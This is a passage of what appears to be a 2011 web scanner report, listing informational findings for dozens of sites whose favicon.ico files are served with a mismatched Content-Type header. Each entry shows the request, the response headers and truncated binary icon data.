..............h...&... ..............(....... ...........@...........................4.......,Q{.8U...$f.M...(0..I......)K..G...F}.."4..$?n...i.:b..9w......C...?k...'~.5X..&2v.E...(;..#>..=......."-
...[SNIP]...

27.97. http://www.greenwichmeantime.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.greenwichmeantime.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greenwichmeantime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:31 GMT
Server: Apache/2.0.63 (Red Hat)
Last-Modified: Tue, 20 Dec 2005 15:01:41 GMT
ETag: "c8c01e-57e-f340d0c0"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain

..............h.......(....... ...........@.............................................................................................................................................................
...[SNIP]...

27.98. http://www.harvard.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.harvard.edu
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.harvard.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:01:01 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 22 Oct 2010 04:10:38 GMT
ETag: "2d98606-47e-d332ab80"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ....................................................q**.....d................................................ZZ..............vv....................................
...[SNIP]...

27.99. http://www.hiexpress.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hiexpress.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hiexpress.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Thu, 11 Jun 2009 15:08:05 GMT
ETag: "e6ba-47e-4a311dd5"
Accept-Ranges: bytes
Content-Length: 1150
Expires: Sat, 02 Apr 2011 13:36:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:36:17 GMT
Connection: close
Set-Cookie: TLTSID=2FD741865D2E105D041AB024DF96EAB9; Path=/; Domain=.hiexpress.com
Set-Cookie: TLTUID=2FD741865D2E105D041AB024DF96EAB9; Path=/; Domain=.hiexpress.com; expires=Sat, 02-04-2021 13:36:17 GMT
Set-Cookie: datacenternode=us-md-vz;domain=.hiexpress.com;path=/

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

27.100. http://www.holidayinn.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.holidayinn.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.holidayinn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Thu, 11 Jun 2009 15:08:05 GMT
ETag: "3c877-47e-4a311dd5"
Accept-Ranges: bytes
Content-Length: 1150
Expires: Sat, 02 Apr 2011 13:33:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:33:20 GMT
Connection: close
Set-Cookie: TLTSID=C6463A385D2D105D01AFD68221F72F8C; Path=/; Domain=.holidayinn.com
Set-Cookie: TLTUID=C6463A385D2D105D01AFD68221F72F8C; Path=/; Domain=.holidayinn.com; expires=Sat, 02-04-2021 13:33:20 GMT
Set-Cookie: datacenternode=us-md-vz;domain=.holidayinn.com;path=/

............ .h.......(....... ..... .............................................................................................-.5.5.<.C.M.F.Y.B.N.5.L..r..*p..<.N.A.B.B.@.D.A.../.<.3...........    ...
...[SNIP]...

27.101. http://www.hollywoodreporter.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hollywoodreporter.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hollywoodreporter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/plain; charset=UTF-8
Last-Modified: Sun, 03 Oct 2010 20:25:16 GMT
Cache-Control: max-age=132497
Expires: Mon, 04 Apr 2011 02:33:12 GMT
Date: Sat, 02 Apr 2011 13:44:55 GMT
Content-Length: 11502
Connection: close

..............h...6... ..............00..........F...(....... ...........@..........................................................................................
...[SNIP]...

27.102. http://www.home-remedies-for-you.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.home-remedies-for-you.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.home-remedies-for-you.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:20:05 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 08 Jun 2009 06:45:25 GMT
ETag: "2a40073-47e-46bd096402b40"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... ........................................    ....1.L|..*... ...#...+.C.bx...'............................]................................'....*.....................
...[SNIP]...

27.103. http://www.ichotelsgroup.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ichotelsgroup.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ichotelsgroup.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Fri, 09 May 2008 23:45:44 GMT
ETag: "4158-57e-4824e228"
Accept-Ranges: bytes
Content-Length: 1406
Expires: Sat, 02 Apr 2011 13:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:37:25 GMT
Connection: close
Set-Cookie: TLTSID=587EC2EE5D2E105D0C7CAE80051D85A1; Path=/; Domain=.ichotelsgroup.com
Set-Cookie: TLTUID=587EC2EE5D2E105D0C7CAE80051D85A1; Path=/; Domain=.ichotelsgroup.com; expires=Sat, 02-04-2021 13:37:25 GMT

..............h.......(....... ........................................................................ @.. `.. ... ... ... ...@...@ ..@@..@`..@...@...@...@...`...` ..`@..``..`...`...`...`........ ...
...[SNIP]...

27.104. http://www.imagevenue.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.imagevenue.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.imagevenue.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:52 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 02 May 2010 05:00:40 GMT
ETag: "1a51266-25be-5b95ae00"
Accept-Ranges: bytes
Content-Length: 9662
Connection: close
Content-Type: text/plain; charset=UTF-8

......00.... ..%......(...0...`..... ..............................#'..."... ... .........|.......................Hlr.-X[.0[^.-RV.,JO...$......
...'/.+DN.E^h.Iam.Zmz.<IW.,3B.        ...........,7.>P[.9KV.Pb
...[SNIP]...

27.105. http://www.inc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.inc.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:44 GMT
Server: VoxCAST
Last-Modified: Mon, 02 Apr 2007 20:48:57 GMT
ETag: "98f473-229e-42d275998c040"
Accept-Ranges: bytes
Content-Length: 8862
Cache-Control: max-age=259200
Expires: Sat, 02 Apr 2011 14:49:16 GMT
Age: 257428
X-Cache: HIT from VoxCAST
Content-Type: text/plain; charset=UTF-8

..............h...f...........h....... ......0...6    .. ..........f
.. ..........N.. ..............(....... ...........@.............................................................................
...[SNIP]...

27.106. http://www.infomash.org/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.infomash.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.infomash.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:37 GMT
Server: Apache
Last-Modified: Thu, 05 Aug 2010 13:13:44 GMT
ETag: "14301f9-57e-48d1351da5200"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@.....................J...P...o...|...s...c...t...x...{...f..._...............................................f.........mlm.yxz.....sqt.........onp.........dc
...[SNIP]...

27.107. http://www.infowars.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.infowars.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.infowars.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
ETag: "35581af-47e-663f75c0"
Accept-Ranges: bytes
Cache-Control: max-age=290304000, public
Content-Type: text/plain; charset=UTF-8
Age: 67809395
Date: Sat, 02 Apr 2011 13:42:30 GMT
Last-Modified: Fri, 16 May 2008 03:13:35 GMT
Expires: Wed, 13 Jun 2018 04:12:46 GMT
Content-Length: 1150
Connection: keep-alive

............ .h.......(....... ..... ...................................................................................................P.......2.......Y.......A...........]...~.......j...............
...[SNIP]...

27.108. http://www.ivillage.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ivillage.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain a BMP image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ivillage.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/plain; charset=UTF-8
Accept-Ranges: bytes
Last-Modified: Thu, 04 Nov 2010 02:16:04 GMT
Content-Length: 1334
Date: Sat, 02 Apr 2011 13:25:48 GMT
Connection: close

BM6.......6...(......................................."4..$4..$3.."4..#5..%4..'5..$6..(6..&2..0@..1A..L[..Ye..Xg..Zg..[f..\g..]f..\e..]g..]h..[h..gt..kt..x~............................................
...[SNIP]...

27.109. http://www.jango.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.jango.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jango.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:46 GMT
Server: Apache
Last-Modified: Fri, 20 Aug 2010 19:24:57 GMT
ETag: "3e01c9-56ee-48e46410bf440"
Accept-Ranges: bytes
Content-Length: 22254
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .....6... .... .........@@.... .(B......(............. .............................kM0.jL/3iJ.4hJ,6D0.I7$...u^.........dH/./".]^D*9mO2.....kM0.jL/.gJ..dH-.cF+.J5 .{aJ.................cH
...[SNIP]...

27.110. http://www.jcwhitney.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.jcwhitney.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jcwhitney.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 17 Sep 2009 05:40:13 GMT
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:52:00 GMT
Content-Length: 1150
Connection: close

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

27.111. http://www.joann.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.joann.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.joann.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R3374572646; path=/; expires=Sun, 03-Apr-2011 13:43:27 GMT
Date: Sat, 02 Apr 2011 13:42:35 GMT
Set-Cookie: ACE_COOKIE=R1260911085; path=/; expires=Sun, 03-Apr-2011 13:43:27 GMT
Server: Apache
Last-Modified: Fri, 23 Oct 2009 14:46:01 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 894

..............h.......(....... ...............................1;
...[SNIP]...

27.112. http://www.jobsonline.net/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.jobsonline.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jobsonline.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:45:41 GMT
Server: Perlbal
Last-Modified: Thu, 27 Jul 2006 21:27:40 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 3638
Connection: close

..............h...&... ..............(....... ...........@............................tO.w.................................................n..........................................iL...............
...[SNIP]...

27.113. http://www.justia.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.justia.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.justia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:26 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 13 Jan 2010 03:25:19 GMT
ETag: "3932a173-37e-47d0351e245c0"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...............................................................................q;.zG-.xe........................................xe.....s......r...................r....
...[SNIP]...

27.114. http://www.justluxe.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.justluxe.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.justluxe.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 07 May 2009 06:14:13 GMT
ETag: "13f8311-47e-4694c6bbfb740"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .........................................................0QS.0QS    ........................................0QS.0QS.0QSH0QS.0QS.0QSK0QS'0QS.0QS'......................
...[SNIP]...

27.115. http://www.k12.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.k12.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.k12.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:05 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 21 Sep 2007 19:11:38 GMT
ETag: "47e-43aaa0a452e80"
Accept-Ranges: bytes
Content-Length: 1150
Link: </labels.rdf>; /="/"; rel="meta" type="application/rdf+xml"; title="ICRA labels";
pics-label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 c 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0) "http://www.icra.org/ratingsv02.html" l r (nz 1 vz 1 lz 1 oz 1 cz 1) "http://www.rsac.org/ratingsv01.html" l r(n 0 s 0 v 0 l 0))
Cache-Control: no-cache
Pragma: no-cache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

27.116. http://www.kazaa.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kazaa.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kazaa.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Mar 2011 05:16:53 GMT
ETag: "e00cdf-47e-49ea6c4f51b40"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ............................................:.........................}q2.vi............................z............
...........    ........shf.yj...................
...[SNIP]...

27.117. http://www.kcom.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kcom.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749040; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fcontact-us%2Fbrighton%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.5.9.1301752673281

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:26 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 16 Nov 2009 15:24:32 GMT
ETag: "2a6a5-47e-9b350c00"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...........................}.................!s..!p......0...4...H.M.H.M.H.M.:...4...4.....O...k.....................1...?.y.4...C.f.H.M.H.M.G.S.7...4.....B...6...
...[SNIP]...

27.118. http://www.kcom.com/favicon1.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kcom.com
Path:   /favicon1.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon1.ico HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; exp_last_activity=1301749016; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.1.10.1301752662

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:02 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 26 Nov 2009 10:39:58 GMT
ETag: "5aa56-47e-cbee3b80"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...........................}.................!s..!p......0...4...H.M.H.M.H.M.:...4...4.....O...k.....................1...?.y.4...C.f.H.M.H.M.G.S.7...4.....B...6...
...[SNIP]...

27.119. http://www.kickapps.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kickapps.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kickapps.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:41:42 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 5
Connection: close
Content-Type: text/html; charset=UTF-8

ERROR

27.120. http://www.lijit.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.lijit.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lijit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:05 GMT
Server: PWS/1.7.1.5
X-Px: ht iad-agg-n6.panthercdn.com
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 09:34:49 GMT
Age: 15016
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 17 Mar 2011 12:33:04 GMT
Connection: keep-alive

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

27.121. http://www.livevideo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.livevideo.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livevideo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 02 Apr 2011 14:04:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=q58e2q8qs5alfuj8eu827ing04; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 503 Service Temporarily Unavailable
Retry-After: 7200
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25139


<font face=arial size=2>
<table border=0 cellspacing=0 cellpadding=0 width=750 align=center><tr><td>
<center><br><img src="/live-video.gif"><br><br>

<table border=0 cellspacing=0 cellpadding=20 widt
...[SNIP]...

27.122. http://www.localpages.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.localpages.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.localpages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:21 GMT
Server: Apache
Last-Modified: Thu, 11 Feb 2010 00:16:39 GMT
ETag: "2a867c-37e-47f48108ea7c0"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...................................................T...............................................V.........................................D....r.....................
...[SNIP]...

27.123. http://www.localschooldirectory.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.localschooldirectory.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.localschooldirectory.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:23 GMT
Server: Apache/2.2.4 (Fedora)
Vary: Host
Last-Modified: Sat, 06 Nov 2010 18:54:40 GMT
ETag: "5b0543-29b-ec5dfc00"
Accept-Ranges: bytes
Content-Length: 667
Cache-Control: max-age=2592000, public
Connection: close
